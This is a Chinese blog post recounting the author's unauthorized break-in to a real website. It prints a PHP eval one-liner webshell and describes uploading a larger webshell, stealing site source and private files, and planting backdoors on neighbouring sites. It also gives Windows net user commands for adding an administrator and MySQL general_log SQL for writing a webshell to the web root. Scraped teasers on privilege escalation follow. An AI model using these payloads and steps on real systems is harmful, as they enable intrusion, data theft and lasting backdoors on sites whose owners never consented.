一次PHP大马提权
记一次PHP提权
发现
PHP大马:指木马病毒;PHP大马,就是PHP写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。
自从师哥那里听说过之后,一直感叹于PHP大马的神奇...但一直没有机会。
直到有一天,某同学发来一个学习网站,随便翻了翻感觉嘿嘿嘿!还行......
试着上传一句话木马
<?php @eval($_POST['a']);?>
呃,显示上传成功...那就上蚁剑,直接连吧。
结果成了,这比我之前想的简单这么多吗???
既然到这儿了,为什么不试一下PHP大马呢?
来吧!
准备一枚PHP大马,通过蚁剑上传。
(PHP大马代码太多了,在网站直接上传的话,不容易成功)
输入密码,进入一看,我直接好家伙!毕竟是第一次去用它嘛。
网站源码都在里面了,还有网站后门。。。
发现了一个文件夹,点进去,发现了按日期排序的某些不可言明的学习资料。。。直接下载!
那为什么大马能实现这些功能呢?
通过socket或curl远程读取服务器phpapi.info上的大马数据,有意思的一点是把大马数据保存在session中,而不是写到文件中,所以要根据代码查杀是不行的。只要服务器不清除session中的数据,大马就会一直存在。
其他东西
去到上级目录,旁站的数据也看到了。。。还有赌博站、发卡站等,看了看有七八个站。
那网站源码我就存下了,学习资料也顺手留下啦!
顺便在旁站留下后门,别问,问就是为了好好学习!
我们可以新建管理用户、查看PHP版本
(这个站的PHP版本应该是7.1.33的)
还可以MYSQL提权!这我真没想到(这枚大马是师哥送我的,我也是第一次去使用它)
有了MySQL提权,我们可以试着利用日志写入webshell。直接提权的话也可以试试(反正我没试过)。
PHP大马提权过程简写
WINDOWS常见命令:
net user 查看所有用户
query user 查看当前运行中的用户
net user 用户名 密码 修改用户密码
net user 用户名 密码 /add 添加用户
net user 用户名 密码 /active 激活用户
net localgroup administrators 用户名 /add 添加管理员组
1.利用蚁剑上传cmd.exe
2.执行后,先查看所有用户,然后新建用户并将其填到管理员用户组下,用户名密码随便设置一个就好。
3.在WINDOWS10自带搜索框搜素mstsc呼出,点击远程桌面连接,输入ip即可连接服务器
MYSQL提权
MYSQL提权作用很大,我是从别处学到的,学艺不精,不敢妄语。
利用log日志写入WebShell
log日志可以保存所有的查询日志,先执行如下代码看一看基本配置:
show variables like '%general%';
当 general_log=ON 时,所查询的sql语句都会出现在log文件中。那么,如果把 general_log_file 的路径修改为 shell.php,那么所查询的sql语句就会保存在shell.php中,如果我们执行查询一个一句话,就可以getshell。
set global general_log_file = '/var/www/html/shell.php'; # 设置日志文件地址
select '<?php eval($_POST[abc]);?>'; # 查询一句话,此时日志文件shell.php中将写入webshell
set global general_log=OFF; #关闭
如果general_log=OFF的话我们还得需要设置为ON模式,再执行上面的sql语句。
set global general_log = ON;
小小看法
PHP大马和蚁剑哪个好用?我个人认为蚁剑好一些,PHP大马的功能,很多都可以利用蚁剑实现(而且我习惯用蚁剑了)。但其实也无所谓。
具体的PHP大马分析在写,有机会的话会写一个具体的PHP大马分析,并给出我的PHP大马。
一次PHP大马提权的更多相关文章
- 大马提权详细过程webshell到提权
.在shell路径这一栏里输入服务器端cmd.exe对应的绝对路径,这里用我们刚刚上传上去的smallchao.exe 8.WINDOWS常见命令:net user 查看所有用户query user ...
- 通用型正方教务(通杀各版本)存在注入(不需登陆)+获得webshell+提权内网漫游
某个接口页面存在oracle盲注,可以获得当前用户数据库,dump教师用户表,分析密文加密特征(前人研究成果+基友助攻),破译加密的密码.前台管理员登陆,后台文件上传基于黑名单原理,过滤u完全,上传特 ...
- 常用webshell提权方法总结
pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用 ...
- WIN提权总结【本地存档-转载】
[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1 ...
- Meterpreter提权详解
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpr ...
- udf提权
0x00前言: udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限 0x01什么是udf: udf(Userdefined function)是用户自定义函数 在my ...
- 记一次FileZillaServer提权
前段时间检测一个企业网站,在检测该企业的一个下属公司的网站时通过用户名admin和密码123456进入了后台,后台目录就是公司汉语拼音+admin,诸如xxxadmin这种形式的.在后台通过“产品图片 ...
- [原创]IIS提权工具-VBS提权脚本免杀生成器
[原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53| 分类: 原创工具 VBS提权脚本随机加密生成器[K.8] Author: QQ吻 QQ:39 ...
- weblogic系列漏洞整理 -- 3. weblogic 后台提权
目录 三. weblogic 后台提权 0. 思路分析 1. 利用过程 2. 提示和技巧 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.ht ...
随机推荐
- java高级编程笔记(四)
java的Object类: 1.Object 类位于 java.lang 包中,编译时会自动导入:Java 的所有类都继承了 Object,子类可以使用 Object 的所有方法. 2.Object ...
- Python自动化测试面试题-接口篇
目录 Python自动化测试面试题-经验篇 Python自动化测试面试题-用例设计篇 Python自动化测试面试题-Linux篇 Python自动化测试面试题-MySQL篇 Python自动化测试面试 ...
- vscode安装ESlint配置
先安装插件ESLint,后面在设置setting.json中配置加入代码: { "files.autoSave": "afterDelay", "ed ...
- DC-6靶机
仅供个人娱乐 靶机信息 下载地址:https://download.vulnhub.com/dc/DC-6.zip 一.主机发现 nmap -sn 192.168.216.0/24 二.端口扫描 nm ...
- 自动部署Springboot项目脚本小脚本
#!/bin/bash echo '自动部署Springboot项目脚本...' # aaa.jar 项目jar包 pid=`ps -ef|grep aaa.jar|grep -v grep|grep ...
- 18Oracle入门
1 Oracle的服务 Oracle的监听服务:OralceOraDB12Home1TNSListener 需要通过程序链接数据库进行开发的时候,此服务必须打开,如果只是在本机使用,此服务可不启动 O ...
- Java数组05——Arrays类
Arrays类讲解 package array; import java.util.Arrays; public class ArrayDemon07 { public static ...
- 2020年最新阿里、字节、腾讯、京东等一线大厂高频面试(Android岗)真题合集,面试轻松无压力
本文涵盖了阿里巴巴.腾讯.字节跳动.京东.华为等大厂的Android面试真题,不管你是要面试大厂还是普通的互联网公司,这些面试题对你肯定是有帮助的,毕竟大厂一定是行发展的标杆,很多公司的面试官同样会研 ...
- 遗传算法 TSP(Python代码)
该代码是本人根据B站up主侯昶曦的代码所修改的. 原代码github地址:https://github.com/Houchangxi/heuristic-algorithm/blob/master/T ...
- Linux中的账号权限管理
一.用户账号和组账号概述 Linux基于用户身份对资源访问进行控制 1.1.用户账号 超级用户:root 用户是 Linux 操作系统中默认的超级用户账号,对本主机拥有最高的权限.系统中超级用户是唯一 ...